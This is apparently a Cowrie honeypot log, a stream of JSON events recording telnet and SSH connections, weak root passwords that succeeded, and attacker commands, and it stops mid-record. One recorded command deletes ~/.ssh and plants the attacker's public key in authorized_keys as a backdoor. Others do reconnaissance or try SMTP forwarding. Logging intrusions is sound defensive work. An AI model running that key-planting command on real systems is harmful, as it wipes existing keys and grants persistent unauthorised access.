{"eventid":"cowrie.session.closed","duration":12.803620100021362,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:09:20.937958Z","src_ip":"212.227.125.160","session":"6c12dfb9e6f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40534,"dst_ip":"1.2.3.4","dst_port":23,"session":"6b3fb4a01934","protocol":"telnet","message":"New connection: 212.227.125.160:40534 (1.2.3.4:23) [session: 6b3fb4a01934]","sensor":"my-vps","timestamp":"2025-08-31T08:09:21.133762Z"}
{"eventid":"cowrie.session.closed","duration":12.801936864852905,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:09:33.935621Z","src_ip":"212.227.125.160","session":"6b3fb4a01934"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40832,"dst_ip":"1.2.3.4","dst_port":23,"session":"c79d90fca30c","protocol":"telnet","message":"New connection: 212.227.125.160:40832 (1.2.3.4:23) [session: c79d90fca30c]","sensor":"my-vps","timestamp":"2025-08-31T08:09:34.128243Z"}
{"eventid":"cowrie.session.closed","duration":12.799514770507812,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:09:46.927682Z","src_ip":"212.227.125.160","session":"c79d90fca30c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41149,"dst_ip":"1.2.3.4","dst_port":23,"session":"fe26fbab8fe5","protocol":"telnet","message":"New connection: 212.227.125.160:41149 (1.2.3.4:23) [session: fe26fbab8fe5]","sensor":"my-vps","timestamp":"2025-08-31T08:09:47.142256Z"}
{"eventid":"cowrie.session.closed","duration":12.824925184249878,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:09:59.967123Z","src_ip":"212.227.125.160","session":"fe26fbab8fe5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41462,"dst_ip":"1.2.3.4","dst_port":23,"session":"179200eba54b","protocol":"telnet","message":"New connection: 212.227.125.160:41462 (1.2.3.4:23) [session: 179200eba54b]","sensor":"my-vps","timestamp":"2025-08-31T08:10:00.174077Z"}
{"eventid":"cowrie.session.closed","duration":12.670475482940674,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:10:12.844483Z","src_ip":"212.227.125.160","session":"179200eba54b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:10:14.807836Z","src_ip":"176.65.148.28","session":"2af22fdd40a2"}
{"eventid":"cowrie.session.closed","duration":180.06582188606262,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:10:14.812216Z","src_ip":"176.65.148.28","session":"2af22fdd40a2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55910,"dst_ip":"1.2.3.4","dst_port":22,"session":"c99fd3a652e5","protocol":"ssh","message":"New connection: 217.72.205.35:55910 (1.2.3.4:22) [session: c99fd3a652e5]","sensor":"my-vps","timestamp":"2025-08-31T08:11:23.341800Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:11:23.343132Z","src_ip":"217.72.205.35","session":"c99fd3a652e5"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":26472,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7ef72b70eea","protocol":"ssh","message":"New connection: 80.94.95.15:26472 (1.2.3.4:22) [session: b7ef72b70eea]","sensor":"my-vps","timestamp":"2025-08-31T08:12:25.875839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T08:12:25.876788Z","src_ip":"80.94.95.15","session":"b7ef72b70eea"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T08:12:25.927962Z","src_ip":"80.94.95.15","session":"b7ef72b70eea"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:12:26.224049Z","src_ip":"80.94.95.15","session":"b7ef72b70eea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"80.94.95.15","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-31T08:12:26.277062Z","session":"b7ef72b70eea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-31T08:12:26.327958Z","src_ip":"80.94.95.15","session":"b7ef72b70eea"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:12:26.379525Z","src_ip":"80.94.95.15","session":"b7ef72b70eea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55820,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef7cb6c4f2f5","protocol":"ssh","message":"New connection: 212.227.125.160:55820 (1.2.3.4:22) [session: ef7cb6c4f2f5]","sensor":"my-vps","timestamp":"2025-08-31T08:12:32.025595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:12:33.767712Z","src_ip":"212.227.125.160","session":"ef7cb6c4f2f5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:12:33.768393Z","src_ip":"212.227.125.160","session":"ef7cb6c4f2f5"}
{"eventid":"cowrie.login.success","username":"root","password":"Solucao","message":"login attempt [root/Solucao] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:12:40.307302Z","src_ip":"212.227.125.160","session":"ef7cb6c4f2f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:12:43.425776Z","src_ip":"212.227.125.160","session":"ef7cb6c4f2f5"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T08:12:43.426586Z","src_ip":"212.227.125.160","session":"ef7cb6c4f2f5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:12:44.497687Z","src_ip":"212.227.125.160","session":"ef7cb6c4f2f5"}
{"eventid":"cowrie.session.closed","duration":"12.5","message":"Connection lost after 12.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:12:44.498821Z","src_ip":"212.227.125.160","session":"ef7cb6c4f2f5"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":45206,"dst_ip":"1.2.3.4","dst_port":22,"session":"524bfd9f56d1","protocol":"ssh","message":"New connection: 201.148.180.50:45206 (1.2.3.4:22) [session: 524bfd9f56d1]","sensor":"my-vps","timestamp":"2025-08-31T08:12:50.869421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T08:12:52.097934Z","src_ip":"201.148.180.50","session":"524bfd9f56d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T08:12:52.098706Z","src_ip":"201.148.180.50","session":"524bfd9f56d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40789,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a89eada5e94","protocol":"ssh","message":"New connection: 212.227.235.229:40789 (1.2.3.4:22) [session: 4a89eada5e94]","sensor":"my-vps","timestamp":"2025-08-31T08:12:56.469893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:12:56.470651Z","src_ip":"212.227.235.229","session":"4a89eada5e94"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:12:56.651037Z","src_ip":"212.227.235.229","session":"4a89eada5e94"}
{"eventid":"cowrie.login.success","username":"root","password":"Solucao","message":"login attempt [root/Solucao] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:12:57.929936Z","src_ip":"201.148.180.50","session":"524bfd9f56d1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:13:01.025728Z","src_ip":"201.148.180.50","session":"524bfd9f56d1"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-31T08:13:01.026686Z","src_ip":"201.148.180.50","session":"524bfd9f56d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:13:02.369630Z","src_ip":"201.148.180.50","session":"524bfd9f56d1"}
{"eventid":"cowrie.session.closed","duration":"11.5","message":"Connection lost after 11.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:13:02.416443Z","src_ip":"201.148.180.50","session":"524bfd9f56d1"}
{"eventid":"cowrie.login.success","username":"root","password":"123!@#QWE","message":"login attempt [root/123!@#QWE] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:13:06.531578Z","src_ip":"212.227.235.229","session":"4a89eada5e94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:13:07.468697Z","src_ip":"212.227.235.229","session":"4a89eada5e94"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T08:13:07.469419Z","src_ip":"212.227.235.229","session":"4a89eada5e94"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T08:13:07.470472Z","src_ip":"212.227.235.229","session":"4a89eada5e94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:13:07.868081Z","src_ip":"212.227.235.229","session":"4a89eada5e94"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T08:13:10.521153Z","src_ip":"212.227.235.229","session":"4a89eada5e94"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T08:13:10.521985Z","src_ip":"212.227.235.229","session":"4a89eada5e94"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T08:13:10.716267Z","src_ip":"212.227.235.229","session":"4a89eada5e94"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:13:10.717119Z","src_ip":"212.227.235.229","session":"4a89eada5e94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45831,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e396279a8a8","protocol":"ssh","message":"New connection: 212.227.235.229:45831 (1.2.3.4:22) [session: 8e396279a8a8]","sensor":"my-vps","timestamp":"2025-08-31T08:13:10.871391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:13:12.538761Z","src_ip":"212.227.235.229","session":"8e396279a8a8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:13:12.699285Z","src_ip":"212.227.235.229","session":"8e396279a8a8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T08:13:20.710058Z","src_ip":"212.227.235.229","session":"8e396279a8a8"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:13:21.880953Z","src_ip":"212.227.235.229","session":"8e396279a8a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49584,"dst_ip":"1.2.3.4","dst_port":22,"session":"96925b348df9","protocol":"ssh","message":"New connection: 212.227.235.229:49584 (1.2.3.4:22) [session: 96925b348df9]","sensor":"my-vps","timestamp":"2025-08-31T08:13:22.068791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:13:22.074929Z","src_ip":"212.227.235.229","session":"96925b348df9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T08:13:22.239822Z","src_ip":"212.227.235.229","session":"96925b348df9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T08:13:26.289411Z","src_ip":"212.227.235.229","session":"96925b348df9"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:13:26.775545Z","src_ip":"212.227.235.229","session":"96925b348df9"}
{"eventid":"cowrie.session.closed","duration":"30.3","message":"Connection lost after 30.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:13:26.777421Z","src_ip":"212.227.235.229","session":"4a89eada5e94"}
{"eventid":"cowrie.session.connect","src_ip":"103.96.72.171","src_port":48070,"dst_ip":"1.2.3.4","dst_port":22,"session":"d897269484b5","protocol":"ssh","message":"New connection: 103.96.72.171:48070 (1.2.3.4:22) [session: d897269484b5]","sensor":"my-vps","timestamp":"2025-08-31T08:13:47.299858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T08:13:53.581786Z","src_ip":"103.96.72.171","session":"d897269484b5"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521